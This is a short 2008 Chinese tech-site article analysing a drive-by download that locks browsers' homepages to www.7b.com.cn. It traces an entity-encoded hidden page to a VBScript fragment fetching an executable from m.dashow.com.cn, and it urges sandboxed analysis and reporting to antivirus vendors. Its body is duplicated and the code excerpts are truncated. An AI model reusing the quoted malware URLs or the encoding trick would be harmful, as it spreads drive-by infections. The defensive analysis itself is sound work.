轻松挖出恶意网站中藏的病毒
新客网 XKER.COM 2008-03-10 来源:电脑爱好者 收藏本文
前不久,很多网友都感染了www.7b.com.cn的病毒,首页被改成这个网站,并且无法改回。黑客是如何做到锁定用户的浏览器首页呢?下面我们就去探个究竟。
提醒:分析病毒存在一定风险,建议在虚拟机下操作。
第一步 查看www.7b.com.cn首页的源代码,可以发现在尾部有如下的字样:
这是一个嵌入到7b网址之家首页的页面,即打开www.7b.com.cn也就同时打开了这个页面。
而“http://m.dashow.com.cn/m.html”表示的是一个字符串,“&#”后面是每个字符串ASCII的十进制值。
直接把这段乱码保存为HTM文件,用IE打开,就可以看到它的真实面目“http://m.dashow.com.cn/m.html”。
第二步 查看http://m.dashow.com.cn/m.html的源代码,把看的
第三步 经过上几步的还原后终于看到了这个恶意页面的最终面目。
on error resume next curl = "http://m.dashow.com.cn/start.exe"……其后省略。
这段代码中我们可以很清楚地看到http://m.dashow.com.cn/start.exe这个链接。没错,它就是运行后可以将用户主页锁定为www.7b.com.cn的病毒。
可以用下载工具将这个文件下载下来,如果你的杀毒软件查不到的话最好立即上报。这样可以保证杀毒软件快速查杀这个病毒,并使更少的网友免受该病毒的侵害。
提醒:分析病毒存在一定风险,建议在虚拟机下操作。
第一步 查看www.7b.com.cn首页的源代码,可以发现在尾部有如下的字样:
这是一个嵌入到7b网址之家首页的页面,即打开www.7b.com.cn也就同时打开了这个页面。
而“http://m.dashow.com.cn/m.html”表示的是一个字符串,“&#”后面是每个字符串ASCII的十进制值。
直接把这段乱码保存为HTM文件,用IE打开,就可以看到它的真实面目“http://m.dashow.com.cn/m.html”。
第二步 查看http://m.dashow.com.cn/m.html的源代码,把看的
第三步 经过上几步的还原后终于看到了这个恶意页面的最终面目。
on error resume next curl = "http://m.dashow.com.cn/start.exe"……其后省略。
这段代码中我们可以很清楚地看到http://m.dashow.com.cn/start.exe这个链接。没错,它就是运行后可以将用户主页锁定为www.7b.com.cn的病毒。
可以用下载工具将这个文件下载下来,如果你的杀毒软件查不到的话最好立即上报。这样可以保证杀毒软件快速查杀这个病毒,并使更少的网友免受该病毒的侵害。
上一篇:解析网页后门和挂马 下一篇:十五个典型信息安全问题需解决
最新相关文章发表评论
评论内容:不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
阅读排行
随机推荐
实用信息推荐